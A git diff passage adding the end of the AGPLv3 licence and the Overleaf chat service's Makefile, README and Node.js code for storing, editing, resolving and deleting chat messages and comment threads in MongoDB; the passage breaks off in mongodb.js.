infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Remote Network Interaction; Use with the GNU General Public License. + + Notwithstanding any other provision of this License, if you modify the +Program, your modified version must prominently offer all users +interacting with it remotely through a computer network (if your version +supports such interaction) an opportunity to receive the Corresponding +Source of your version by providing access to the Corresponding Source +from a network server at no charge, through some standard or customary +means of facilitating copying of software. This Corresponding Source +shall include the Corresponding Source for any work covered by version 3 +of the GNU General Public License that is incorporated pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +. diff --git a/services/chat/Makefile b/services/chat/Makefile new file mode 100644 index 0000000..94f0afb --- /dev/null +++ b/services/chat/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = chat +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/chat/README.md b/services/chat/README.md new file mode 100644 index 0000000..8bbc012 --- /dev/null +++ b/services/chat/README.md @@ -0,0 +1,11 @@ +overleaf/chat +=============== + +The backend API that powers the chat service in Overleaf + +License +------- + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file. + +Copyright (c) Overleaf, 2014-2019. diff --git a/services/chat/app.js b/services/chat/app.js new file mode 100644 index 0000000..691b4ce --- /dev/null +++ b/services/chat/app.js @@ -0,0 +1,26 @@ +// Metrics must be initialized before importing anything else +import '@overleaf/metrics/initialize.js' + +import logger from '@overleaf/logger' +import settings from '@overleaf/settings' +import { mongoClient } from './app/js/mongodb.js' +import { createServer } from './app/js/server.js' + +const port = settings.internal.chat.port +const host = settings.internal.chat.host +mongoClient + .connect() + .then(async () => { + const { server } = await createServer() + server.listen(port, host, function (err) { + if (err) { + logger.fatal({ err }, `Cannot bind to ${host}:${port}. Exiting.`) + process.exit(1) + } + logger.debug(`Chat starting up, listening on ${host}:${port}`) + }) + }) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) + }) diff --git a/services/chat/app/js/Features/Messages/MessageFormatter.js b/services/chat/app/js/Features/Messages/MessageFormatter.js new file mode 100644 index 0000000..31e9300 --- /dev/null +++ b/services/chat/app/js/Features/Messages/MessageFormatter.js @@ -0,0 +1,60 @@ +export function formatMessageForClientSide(message) { + if (message._id) { + message.id = message._id.toString() + delete message._id + } + const formattedMessage = { + id: message.id, + content: message.content, + timestamp: message.timestamp, + user_id: message.user_id, + } + if (message.edited_at) { + formattedMessage.edited_at = message.edited_at + } + return formattedMessage +} + +export function formatMessagesForClientSide(messages) { + return messages.map(message => formatMessageForClientSide(message)) +} + +export function groupMessagesByThreads(rooms, messages) { + let room, thread + const roomsById = {} + for (room of rooms) { + roomsById[room._id.toString()] = room + } + + const threads = {} + const getThread = function (room) { + const threadId = room.thread_id.toString() + if (threads[threadId]) { + return threads[threadId] + } else { + const thread = { messages: [] } + if (room.resolved) { + thread.resolved = true + thread.resolved_at = room.resolved.ts + thread.resolved_by_user_id = room.resolved.user_id + } + threads[threadId] = thread + return thread + } + } + + for (const message of messages) { + room = roomsById[message.room_id.toString()] + if (room) { + thread = getThread(room) + thread.messages.push(formatMessageForClientSide(message)) + } + } + + for (const threadId in threads) { + thread = threads[threadId] + thread.messages.sort((a, b) => a.timestamp - b.timestamp) + } + + return threads +} diff --git a/services/chat/app/js/Features/Messages/MessageHttpController.js b/services/chat/app/js/Features/Messages/MessageHttpController.js new file mode 100644 index 0000000..45208e2 --- /dev/null +++ b/services/chat/app/js/Features/Messages/MessageHttpController.js @@ -0,0 +1,313 @@ +import logger from '@overleaf/logger' +import * as MessageManager from './MessageManager.js' +import * as MessageFormatter from './MessageFormatter.js' +import * as ThreadManager from '../Threads/ThreadManager.js' +import { ObjectId } from '../../mongodb.js' + +const DEFAULT_MESSAGE_LIMIT = 50 +const MAX_MESSAGE_LENGTH = 10 * 1024 // 10kb, about 1,500 words + +function readContext(context, req) { + req.body = context.requestBody + req.params = context.params.path + req.query = context.params.query + if (typeof req.params.projectId !== 'undefined') { + if (!ObjectId.isValid(req.params.projectId)) { + context.res.status(400).setBody('Invalid projectId') + } + } + if (typeof req.params.threadId !== 'undefined') { + if (!ObjectId.isValid(req.params.threadId)) { + context.res.status(400).setBody('Invalid threadId') + } + } +} + +/** + * @param context + * @param {(req: unknown, res: unknown) => Promise} ControllerMethod + * @returns {Promise<*>} + */ +export async function callMessageHttpController(context, ControllerMethod) { + const req = {} + readContext(context, req) + if (context.res.statusCode !== 400) { + return await ControllerMethod(req, context.res) + } else { + return context.res.body + } +} + +export async function getGlobalMessages(context) { + return await callMessageHttpController(context, _getGlobalMessages) +} + +export async function sendGlobalMessage(context) { + return await callMessageHttpController(context, _sendGlobalMessage) +} + +export async function sendMessage(context) { + return await callMessageHttpController(context, _sendThreadMessage) +} + +export async function getThreads(context) { + return await callMessageHttpController(context, _getAllThreads) +} + +export async function resolveThread(context) { + return await callMessageHttpController(context, _resolveThread) +} + +export async function reopenThread(context) { + return await callMessageHttpController(context, _reopenThread) +} + +export async function deleteThread(context) { + return await callMessageHttpController(context, _deleteThread) +} + +export async function editMessage(context) { + return await callMessageHttpController(context, _editMessage) +} + +export async function deleteMessage(context) { + return await callMessageHttpController(context, _deleteMessage) +} + +export async function deleteUserMessage(context) { + return await callMessageHttpController(context, _deleteUserMessage) +} + +export async function getResolvedThreadIds(context) { + return await callMessageHttpController(context, _getResolvedThreadIds) +} + +export async function destroyProject(context) { + return await callMessageHttpController(context, _destroyProject) +} + +export async function duplicateCommentThreads(context) { + return await callMessageHttpController(context, _duplicateCommentThreads) +} + +export async function generateThreadData(context) { + return await callMessageHttpController(context, _generateThreadData) +} + +export async function getStatus(context) { + const message = 'chat is alive' + context.res.status(200).setBody(message) + return message +} + +const _getGlobalMessages = async (req, res) => { + await _getMessages(ThreadManager.GLOBAL_THREAD, req, res) +} + +async function _sendGlobalMessage(req, res) { + const { user_id: userId, content } = req.body + const { projectId } = req.params + return await _sendMessage( + userId, + projectId, + content, + ThreadManager.GLOBAL_THREAD, + res + ) +} + +async function _sendThreadMessage(req, res) { + const { user_id: userId, content } = req.body + const { projectId, threadId } = req.params + return await _sendMessage(userId, projectId, content, threadId, res) +} + +const _getAllThreads = async (req, res) => { + const { projectId } = req.params + logger.debug({ projectId }, 'getting all threads') + const rooms = await ThreadManager.findAllThreadRooms(projectId) + const roomIds = rooms.map(r => r._id) + const messages = await MessageManager.findAllMessagesInRooms(roomIds) + const threads = MessageFormatter.groupMessagesByThreads(rooms, messages) + res.json(threads) +} + +const _generateThreadData = async (req, res) => { + const { projectId } = req.params + const { threads } = req.body + logger.debug({ projectId }, 'getting all threads') + const rooms = await ThreadManager.findThreadsById(projectId, threads) + const roomIds = rooms.map(r => r._id) + const messages = await MessageManager.findAllMessagesInRooms(roomIds) + logger.debug({ rooms, messages }, 'looked up messages in the rooms') + const threadData = MessageFormatter.groupMessagesByThreads(rooms, messages) + res.json(threadData) +} + +const _resolveThread = async (req, res) => { + const { projectId, threadId } = req.params + const { user_id: userId } = req.body + logger.debug({ userId, projectId, threadId }, 'marking thread as resolved') + await ThreadManager.resolveThread(projectId, threadId, userId) + res.status(204) +} + +const _reopenThread = async (req, res) => { + const { projectId, threadId } = req.params + logger.debug({ projectId, threadId }, 'reopening thread') + await ThreadManager.reopenThread(projectId, threadId) + res.status(204) +} + +const _deleteThread = async (req, res) => { + const { projectId, threadId } = req.params + logger.debug({ projectId, threadId }, 'deleting thread') + const roomId = await ThreadManager.deleteThread(projectId, threadId) + await MessageManager.deleteAllMessagesInRoom(roomId) + res.status(204) +} + +const _editMessage = async (req, res) => { + const { content, userId } = req.body + const { projectId, threadId, messageId } = req.params + logger.debug({ projectId, threadId, messageId, content }, 'editing message') + const room = await ThreadManager.findOrCreateThread(projectId, threadId) + const found = await MessageManager.updateMessage( + room._id, + messageId, + userId, + content, + Date.now() + ) + if (!found) { + res.status(404) + return + } + res.status(204) +} + +const _deleteMessage = async (req, res) => { + const { projectId, threadId, messageId } = req.params + logger.debug({ projectId, threadId, messageId }, 'deleting message') + const room = await ThreadManager.findOrCreateThread(projectId, threadId) + await MessageManager.deleteMessage(room._id, messageId) + res.status(204) +} + +const _deleteUserMessage = async (req, res) => { + const { projectId, threadId, userId, messageId } = req.params + const room = await ThreadManager.findOrCreateThread(projectId, threadId) + await MessageManager.deleteUserMessage(userId, room._id, messageId) + res.status(204) +} + +const _getResolvedThreadIds = async (req, res) => { + const { projectId } = req.params + const resolvedThreadIds = await ThreadManager.getResolvedThreadIds(projectId) + res.json({ resolvedThreadIds }) +} + +const _destroyProject = async (req, res) => { + const { projectId } = req.params + logger.debug({ projectId }, 'destroying project') + const rooms = await ThreadManager.findAllThreadRoomsAndGlobalThread(projectId) + const roomIds = rooms.map(r => r._id) + logger.debug({ projectId, roomIds }, 'deleting all messages in rooms') + await MessageManager.deleteAllMessagesInRooms(roomIds) + logger.debug({ projectId }, 'deleting all threads in project') + await ThreadManager.deleteAllThreadsInProject(projectId) + res.status(204) +} + +async function _sendMessage(userId, projectId, content, clientThreadId, res) { + if (!ObjectId.isValid(userId)) { + const message = 'Invalid userId' + res.status(400).setBody(message) + return message + } + if (!content) { + const message = 'No content provided' + res.status(400).setBody(message) + return message + } + if (content.length > MAX_MESSAGE_LENGTH) { + const message = `Content too long (> ${MAX_MESSAGE_LENGTH} bytes)` + res.status(400).setBody(message) + return message + } + logger.debug( + { clientThreadId, projectId, userId, content }, + 'new message received' + ) + const thread = await ThreadManager.findOrCreateThread( + projectId, + clientThreadId + ) + let message = await MessageManager.createMessage( + thread._id, + userId, + content, + Date.now() + ) + message = MessageFormatter.formatMessageForClientSide(message) + message.room_id = projectId + res.status(201).setBody(message) +} + +async function _getMessages(clientThreadId, req, res) { + let before, limit + const { projectId } = req.params + if (req.query.before) { + before = parseInt(req.query.before, 10) + } else { + before = null + } + if (req.query.limit) { + limit = parseInt(req.query.limit, 10) + } else { + limit = DEFAULT_MESSAGE_LIMIT + } + logger.debug( + { limit, before, projectId, clientThreadId }, + 'get message request received' + ) + const thread = await ThreadManager.findOrCreateThread( + projectId, + clientThreadId + ) + const threadObjectId = thread._id + logger.debug( + { limit, before, projectId, clientThreadId, threadObjectId }, + 'found or created thread' + ) + let messages = await MessageManager.getMessages(threadObjectId, limit, before) + messages = MessageFormatter.formatMessagesForClientSide(messages) + logger.debug({ projectId, messages }, 'got messages') + res.status(200).setBody(messages) +} + +async function _duplicateCommentThreads(req, res) { + const { projectId } = req.params + const { threads } = req.body + const result = {} + for (const id of threads) { + logger.debug({ projectId, thread: id }, 'duplicating thread') + try { + const { oldRoom, newRoom } = await ThreadManager.duplicateThread( + projectId, + id + ) + await MessageManager.duplicateRoomToOtherRoom(oldRoom._id, newRoom._id) + result[id] = { duplicateId: newRoom.thread_id } + } catch (error) { + if (error instanceof ThreadManager.MissingThreadError) { + // Expected error when the comment has been deleted prior to duplication + result[id] = { error: 'not found' } + } else { + logger.err({ error }, 'error duplicating thread') + result[id] = { error: 'unknown' } + } + } + } + res.json({ newThreads: result }) +} diff --git a/services/chat/app/js/Features/Messages/MessageManager.js b/services/chat/app/js/Features/Messages/MessageManager.js new file mode 100644 index 0000000..efff22a --- /dev/null +++ b/services/chat/app/js/Features/Messages/MessageManager.js @@ -0,0 +1,112 @@ +import { db, ObjectId } from '../../mongodb.js' + +export async function createMessage(roomId, userId, content, timestamp) { + let newMessageOpts = { + content, + room_id: roomId, + user_id: userId, + timestamp, + } + newMessageOpts = _ensureIdsAreObjectIds(newMessageOpts) + const confirmation = await db.messages.insertOne(newMessageOpts) + newMessageOpts._id = confirmation.insertedId + return newMessageOpts +} + +export async function getMessages(roomId, limit, before) { + let query = { room_id: roomId } + if (before) { + query.timestamp = { $lt: before } + } + query = _ensureIdsAreObjectIds(query) + return await db.messages + .find(query) + .sort({ timestamp: -1 }) + .limit(limit) + .toArray() +} + +export async function findAllMessagesInRooms(roomIds) { + return await db.messages + .find({ + room_id: { $in: roomIds }, + }) + .toArray() +} + +export async function deleteAllMessagesInRoom(roomId) { + await db.messages.deleteMany({ + room_id: roomId, + }) +} + +export async function deleteAllMessagesInRooms(roomIds) { + await db.messages.deleteMany({ + room_id: { $in: roomIds }, + }) +} + +export async function updateMessage( + roomId, + messageId, + userId, + content, + timestamp +) { + const query = _ensureIdsAreObjectIds({ + _id: messageId, + room_id: roomId, + }) + if (userId) { + query.user_id = new ObjectId(userId) + } + const res = await db.messages.updateOne(query, { + $set: { + content, + edited_at: timestamp, + }, + }) + return res.modifiedCount === 1 +} + +export async function deleteMessage(roomId, messageId) { + const query = _ensureIdsAreObjectIds({ + _id: messageId, + room_id: roomId, + }) + await db.messages.deleteOne(query) +} + +export async function deleteUserMessage(userId, roomId, messageId) { + await db.messages.deleteOne({ + _id: new ObjectId(messageId), + user_id: new ObjectId(userId), + room_id: new ObjectId(roomId), + }) +} + +function _ensureIdsAreObjectIds(query) { + if (query.user_id && !(query.user_id instanceof ObjectId)) { + query.user_id = new ObjectId(query.user_id) + } + if (query.room_id && !(query.room_id instanceof ObjectId)) { + query.room_id = new ObjectId(query.room_id) + } + if (query._id && !(query._id instanceof ObjectId)) { + query._id = new ObjectId(query._id) + } + return query +} + +export async function duplicateRoomToOtherRoom(sourceRoomId, targetRoomId) { + const sourceMessages = await findAllMessagesInRooms([sourceRoomId]) + const targetMessages = sourceMessages.map(comment => { + return _ensureIdsAreObjectIds({ + room_id: targetRoomId, + content: comment.content, + timestamp: comment.timestamp, + user_id: comment.user_id, + }) + }) + await db.messages.insertMany(targetMessages) +} diff --git a/services/chat/app/js/Features/Threads/ThreadManager.js b/services/chat/app/js/Features/Threads/ThreadManager.js new file mode 100644 index 0000000..5697b39 --- /dev/null +++ b/services/chat/app/js/Features/Threads/ThreadManager.js @@ -0,0 +1,157 @@ +import { db, ObjectId } from '../../mongodb.js' + +export class MissingThreadError extends Error {} + +export const GLOBAL_THREAD = 'GLOBAL' + +export async function findOrCreateThread(projectId, threadId) { + let query, update + projectId = new ObjectId(projectId.toString()) + if (threadId !== GLOBAL_THREAD) { + threadId = new ObjectId(threadId.toString()) + } + + if (threadId === GLOBAL_THREAD) { + query = { + project_id: projectId, + thread_id: { $exists: false }, + } + update = { + project_id: projectId, + } + } else { + query = { + project_id: projectId, + thread_id: threadId, + } + update = { + project_id: projectId, + thread_id: threadId, + } + } + + const result = await db.rooms.findOneAndUpdate( + query, + { $set: update }, + { upsert: true, returnDocument: 'after' } + ) + return result +} + +export async function findAllThreadRooms(projectId) { + return await db.rooms + .find( + { + project_id: new ObjectId(projectId.toString()), + thread_id: { $exists: true }, + }, + { + thread_id: 1, + resolved: 1, + } + ) + .toArray() +} + +export async function findAllThreadRoomsAndGlobalThread(projectId) { + return await db.rooms + .find( + { + project_id: new ObjectId(projectId.toString()), + }, + { + thread_id: 1, + resolved: 1, + } + ) + .toArray() +} + +export async function resolveThread(projectId, threadId, userId) { + await db.rooms.updateOne( + { + project_id: new ObjectId(projectId.toString()), + thread_id: new ObjectId(threadId.toString()), + }, + { + $set: { + resolved: { + user_id: userId, + ts: new Date(), + }, + }, + } + ) +} + +export async function reopenThread(projectId, threadId) { + await db.rooms.updateOne( + { + project_id: new ObjectId(projectId.toString()), + thread_id: new ObjectId(threadId.toString()), + }, + { + $unset: { + resolved: true, + }, + } + ) +} + +export async function deleteThread(projectId, threadId) { + const room = await findOrCreateThread(projectId, threadId) + await db.rooms.deleteOne({ + _id: room._id, + }) + return room._id +} + +export async function deleteAllThreadsInProject(projectId) { + await db.rooms.deleteMany({ + project_id: new ObjectId(projectId.toString()), + }) +} + +export async function getResolvedThreadIds(projectId) { + const resolvedThreadIds = await db.rooms + .find( + { + project_id: new ObjectId(projectId), + thread_id: { $exists: true }, + resolved: { $exists: true }, + }, + { projection: { thread_id: 1 } } + ) + .map(record => record.thread_id.toString()) + .toArray() + return resolvedThreadIds +} + +export async function duplicateThread(projectId, threadId) { + const room = await db.rooms.findOne({ + project_id: new ObjectId(projectId), + thread_id: new ObjectId(threadId), + }) + if (!room) { + throw new MissingThreadError('Trying to duplicate a non-existent thread') + } + const newRoom = { + project_id: room.project_id, + thread_id: new ObjectId(), + } + if (room.resolved) { + newRoom.resolved = room.resolved + } + const confirmation = await db.rooms.insertOne(newRoom) + newRoom._id = confirmation.insertedId + return { oldRoom: room, newRoom } +} + +export async function findThreadsById(projectId, threadIds) { + return await db.rooms + .find({ + project_id: new ObjectId(projectId), + thread_id: { $in: threadIds.map(id => new ObjectId(id)) }, + }) + .toArray() +} diff --git a/services/chat/app/js/mongodb.js b/services/chat/app/js/mongodb.js new file mode 100644 index 0000000..2ed6e01 --- /dev/null +++ b/services/chat/app/js/mongodb.js @@ -0,0 +1,18 @@ +import Metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import { MongoClient } from 'mongodb' + +export { ObjectId } from 'mongodb' + +export const mongoClient = new MongoClient( + Settings.mongo.url, + Settings.mongo.options +) +const mongoDb = 